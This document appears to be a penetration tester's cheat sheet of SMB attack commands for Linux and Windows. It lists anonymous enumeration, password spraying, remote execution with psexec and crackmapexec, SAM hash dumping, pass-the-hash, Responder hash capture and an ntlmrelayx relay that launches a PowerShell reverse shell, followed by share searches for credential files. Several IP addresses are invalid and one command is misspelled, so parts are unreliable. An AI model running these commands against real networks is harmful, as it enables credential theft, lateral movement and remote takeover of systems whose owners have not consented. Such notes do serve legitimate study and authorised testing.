abuse

Linux

Enumeration

sudo nmap 10.128.14.129 -sVC -p139,445

Anonymous login check

smbclient -N -L //10.10.10.10

Smbmap (it can use ccache file for authentication)

smbmap  -H 10.10.10.10 -r notes
smbmap -H 10.10.10.10 --download "notes\note.txt
smbmap -H 10.10.10.10 --upload "notes\test.txt

RPCClient

rpcclient -U '%' 10.10.10.10
enumdomusers

Enum4linux-ng

Brute-force and password spray attack

crackmapexec smb "$ip" -u /tmp/userlist.txt -p 'Company01!' --local-auth

Tools

• Psexec (execute commands on system)

	impacket-psexec administrator:'Password123!'@10.10.110.17

• Wmiexec (without using remcomsvc)

• atexec (executes command through task scheduler service)

• Crackmapexec (implementation of smbexec and atexec)

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

• Enumerate logon users

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

• Extract hash from SAM

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

• Pass-the-hash attack

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

• Metasploit psexec

Forced authentication attacks

It is also possible to abuse the SMB protocol by creating a fake SMB server to capture user NetNTLM

sudo responder -I <interface name>

If we are unable to crack the hash, we can relay the captured hash to another machine using ntlmrelayx & multirelay.py

Set SMB off in config

cat /etc/responder/Responder.conf | grep 'SMB ='

Start the relay attack

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Create a reverse shell

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e command'

---

Windows

Remote dir listening (CMD)

dir \\192.158.320.129\finance\

Net use

net use n: \\192.138.220.129\finance
net use n: \\192.138.44.39\finance

Total files

dir n: /a-d /s /b | find /c ":\"

Specific file print

dir n:\*cred* /s /b

Search a word withing file

dindstr /s /i cred n:\*.*

Remote dir listening (powershell)

List of files

Get-ChildItem \\192.138.110.298\finance\

Net use alternative

New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

PS-Credential object

$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

Find specific item

Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
#Find information in file
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List